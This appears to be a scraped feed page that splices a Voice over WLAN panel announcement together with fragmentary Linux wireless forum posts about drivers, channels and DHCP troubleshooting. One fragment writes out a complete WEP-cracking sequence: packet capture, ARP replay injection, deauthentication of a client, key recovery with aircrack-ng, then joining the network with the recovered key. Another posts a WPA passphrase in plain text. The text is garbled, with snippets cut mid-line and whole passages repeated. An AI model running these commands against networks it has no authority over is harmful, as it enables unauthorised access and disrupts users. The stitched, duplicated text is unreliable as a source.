Tags: wireless
Event: Black Hat EU 2005
268037 items (6 unread) in 27 feeds
Related tags: Newbie [+], Area [+], airodump [+], Wireless [+], BackTrack [+], quot [+], Support [+], vulnerability [+], php access [+], nbsp nbsp nbsp nbsp nbsp [+], nbsp [+], direct access [+], d link [+], bsc [+], Hardware [+], General [+], Ecke [+], Anfnger [+], wpa psk [+], wpa [+], wireless extensions [+], root [+], network [+], mac [+], link quality [+], jobby [+], ich [+], ghz [+], device [+], channel 11 [+], channel [+], blah blah [+], Supporto [+], Soporte [+], youtube [+], xxxx [+], wpa wpa2 [+], wpa supplicant [+], wireless chip [+], wifi card [+], wifi [+], wicd [+], w lt [+], vp applications [+], voice [+], video [+], tp link [+], tls [+], tar bz2 [+], sudo [+], stealth [+], start [+], ssl [+], sistema computacional [+], russell knister [+], redes inalambricas [+], realtek rtl8187 [+], provo [+], program [+], prob [+], physical memory [+], persistent database [+], peripherie [+], noob [+], none [+], new dell [+], networkmanager [+], networking [+], mr. oizo [+], mishap [+], miami [+], message code [+], mac addresses [+], linux [+], laurent oudot [+], lan [+], iwconfig [+], ivs [+], invalid [+], intel chipsatz [+], intel 4965 [+], intel [+], init [+], ieee [+], how to connect to a wireless network [+], highpower [+], hash [+], habe [+], g mini [+], farla [+], extension lead [+], ettercap [+], essid [+], enterprise [+], encryption key [+], dwl 650 [+], dhcp leases [+], dhcp clients [+], dhcp [+], dell wireless [+], dell inspiron [+], connection [+], con [+], computer [+], command [+], cisco systems inc [+], cisco callmanager [+], chip set [+], carlos torales [+], bt4 [+], broadcom [+], blip tv [+], black hat [+], bind [+], ben guderian [+], authors [+], authentication request [+], attacker [+], association [+], arphrd [+], arp requests [+], antenna [+], angebot [+], airmon ng [+], adapter [+], Software [+], NON [+], Howto [+], 802 11b [+]
I will be moderating this panel at IT Expo in Miami on February 2nd at 10:00 am.
Voice over WLAN has been deployed in enterprise applications for years, but has yet to reach mainstream adoption (beyond vertical markets). With technologies like mobile UC, 802.11n, fixed-mobile convergence and VoIP for smartphones raising awareness/demand, there are a number of vendors poised to address market needs by introducing new and innovative devices. This session will look at what industries have already adopted VoWLAN and why – and what benefits they have achieved, as well as the technology trends that make VoWLAN possible.
The panelists are:
All three of these companies have a venerable history in enterprise Wi-Fi phones; the two original pioneers of enterprise Voice over Wireless LAN were Symbol and Spectralink, which Motorola and Polycom acquired respectively in 2006 and 2007. Cisco announced a Wi-Fi handset (the 7920) to complement their Cisco CallManager in 2003. But the category has obstinately remained a niche for almost a decade.
It has been clear from the outset that cell phones would get Wi-Fi, and it would be redundant to have dedicated Wi-Fi phones. And of course, now that has come to pass. The advent of the iPhone with Wi-Fi in 2007 subdued the objections of the wireless carriers to Wi-Fi and knocked the phone OEMs off the fence. By 2010 you couldn’t really call a phone without Wi-Fi a smartphone, and feature phones aren’t far behind.
So this session will be very interesting, answering questions about why enterprise voice over Wi-Fi has been so confined, and why that will no longer be the case.
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng --channel <X> --bssid <XXXX...> -w <path> wlan0
aireplay-ng -1 0 -e <XXXX...> -a <XXXX...> -h <XXXX...> wlan0
Filling in the stuff in <>, naturally.Sending Authentication Request
Authentication successful
Sending Association Request
sometimes with [ACK], and sometimes with a "received a deauth packet!")Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode disabled)
I then enable it with monitor mode:root@bt:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon0)
I test injection and it works fine.root@bt:~# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
it just started happening in bt4, to get it to work again i have to disconnect the adapeter and reconnect it.airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
aircrack-ng output*.cap
ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0
Notes:ifconfig wlan1 10.10.10.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o wlan0 -s 10.10.10.0/24 -j MASQUERADE
Also I will set up DHCP on wlan1 so that all my computers at home can get connected to the access point with ease.
Originally Posted by lspci |grep -i net
root@bt:~/acx-20071003# lspci |grep -i net 05:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02) 07:08.0 Ethernet controller: Intel Corporation PRO/100 VE Network Connection (rev 02) 08:00.0 Network controller: Texas Instruments ACX 100 22Mbps Wireless Interface |
root@bt:~/acx-20071003# iwconfig lo no wireless extensions. eth0 no wireless extensions. wmaster0 no wireless extensions. wlan0 IEEE 802.11abg ESSID:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated Tx-Power=0 dBm Retry min limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 |
root@bt:~/acx-20071003# make -C /lib/modules/`uname -r`/build M=`pwd` make: Entering directory `/usr/src/linux-source-2.6.30.9' WARNING: Symbol version dump /usr/src/linux-source-2.6.30.9/Module.symvers is missing; modules will have no dependencies and modversions. CC [M] /root/acx-20071003/wlan.o In file included from /root/acx-20071003/acx.h:2, from /root/acx-20071003/wlan.c:49: /root/acx-20071003/wlan_compat.h:224: error: conflicting types for 'irqreturn_t' include/linux/irqreturn.h:16: error: previous declaration of 'irqreturn_t' was here make[1]: *** [/root/acx-20071003/wlan.o] Error 1 make: *** [_module_/root/acx-20071003] Error 2 make: Leaving directory `/usr/src/linux-source-2.6.30.9' |
The key piece to sorting this out was adding this line to my /etc/modprobe.d/options and then re-starting my system (simple - brute force!): options cfg80211 ieee80211_regdom="EU" "iwlist wlan0 channel" previously only reported channels 1 to 11, but now shows all of them. No problems connecting to the AP now on channel 13: steve@steve-laptop:~$ iwlist wlan0 channel wlan0 13 channels in total; available frequencies : Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz ( blah blah blah blah ) Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Current Frequency=2.472 GHz (Channel 13) |
The key piece to sorting this out was adding this line to my /etc/modprobe.d/options and then re-starting my system (simple - brute force!): options cfg80211 ieee80211_regdom="EU" "iwlist wlan0 channel" previously only reported channels 1 to 11, but now shows all of them. No problems connecting to the AP now on channel 13: steve@steve-laptop:~$ iwlist wlan0 channel wlan0 13 channels in total; available frequencies : Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz ( blah blah blah blah ) Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Current Frequency=2.472 GHz (Channel 13) |
/etc/init.d/NetworkManager start
And then just add a connection to my wlan0 (my router, a linksys) ifconfig wlan0 down
iwconfig wlan0 essid linksys key "s:<thekey>"
ifconfig wlan0 up
(I was under the impression that this was the way to do it?airodump:
00:12:CF:6C:57:73 -66 99 286 7 2 54e. WPA TKIP PSK suat1
root@l:/tmp# cat /etc/wpa_supplicant/net.conf
network={
ssid="suat1"
key_mgmt=WPA-PSK
psk="a2341436z"
}
root@l:/tmp# wpa_supplicant -Dwext -B -c /etc/wpa_supplicant/net.conf -i wlan0
root@l:/tmp# dhclient wlan0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit snip
mon0: unknown hardware address type 803
wmaster0: unknown hardware address type 801
mon0: unknown hardware address type 803
wmaster0: unknown hardware address type 801
Listening on LPF/wlan0/00:1d:e0:a1:25:01
Sending on LPF/wlan0/00:1d:e0:a1:25:01
Sending on Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 8
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 11
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 15
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 9
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 13
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 5
No DHCPOFFERS received.
Trying recorded lease 192.168.1.126
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
--- 192.168.1.1 ping statistics ---
1 packets transmitted, 0 received, +1 errors, 100% packet loss, time 0ms
Trying recorded lease 192.168.2.135
PING 192.168.2.2 (192.168.2.2) 56(84) bytes of data.
--- 192.168.2.2 ping statistics ---
1 packets transmitted, 0 received, +1 errors, 100% packet loss, time 0ms
No working leases in persistent database - sleeping.
root@l:/tmp#
And the output of iwlist:wlan0 Scan completed :
Cell 01 - Address: 00:12:CF:6C:57:73
ESSID:"suat1"
Mode:Master
Channel:2
Frequency:2.417 GHz (Channel 2)
Quality=100/100 Signal level:-46 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 00057375617431
IE: Unknown: 010882848B0C12961824
IE: Unknown: 030102
IE: Unknown: 0706545249010D14
IE: Unknown: 200100
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD180050F2020101020003A4000027A4000042435E0062322F00
IE: Unknown: DD0900037F01010020FF7F
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=00000003a1812181
Extra: Last beacon: 0ms ago
Not sure what's wrong here! Everything looks fine.airodump:
00:12:CF:6C:57:73 -66 99 286 7 2 54e. WPA TKIP PSK suat1
# cat /etc/wpa_supplicant/net.conf
network={
ssid="suat1"
key_mgmt=WPA-PSK
psk="a2341436z"
}
# wpa_supplicant -Dwext -B -c /etc/wpa_supplicant/net.conf -i wlan0
# dhclient wlan0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit snip
mon0: unknown hardware address type 803
wmaster0: unknown hardware address type 801
mon0: unknown hardware address type 803
wmaster0: unknown hardware address type 801
Listening on LPF/wlan0/00:1d:e0:a1:25:01
Sending on LPF/wlan0/00:1d:e0:a1:25:01
Sending on Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 8
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 11
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 15
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 9
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 13
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 5
No DHCPOFFERS received.
Trying recorded lease 192.168.1.126
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
--- 192.168.1.1 ping statistics ---
1 packets transmitted, 0 received, +1 errors, 100% packet loss, time 0ms
Trying recorded lease 192.168.2.135
PING 192.168.2.2 (192.168.2.2) 56(84) bytes of data.
--- 192.168.2.2 ping statistics ---
1 packets transmitted, 0 received, +1 errors, 100% packet loss, time 0ms
No working leases in persistent database - sleeping.
#
And the output of iwlist:wlan0 Scan completed :
Cell 01 - Address: 00:12:CF:6C:57:73
ESSID:"suat1"
Mode:Master
Channel:2
Frequency:2.417 GHz (Channel 2)
Quality=100/100 Signal level:-46 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 00057375617431
IE: Unknown: 010882848B0C12961824
IE: Unknown: 030102
IE: Unknown: 0706545249010D14
IE: Unknown: 200100
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD180050F2020101020003A4000027A4000042435E0062322F00
IE: Unknown: DD0900037F01010020FF7F
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=00000003a1812181
Extra: Last beacon: 0ms ago
Not sure what's wrong here! Everything looks fine.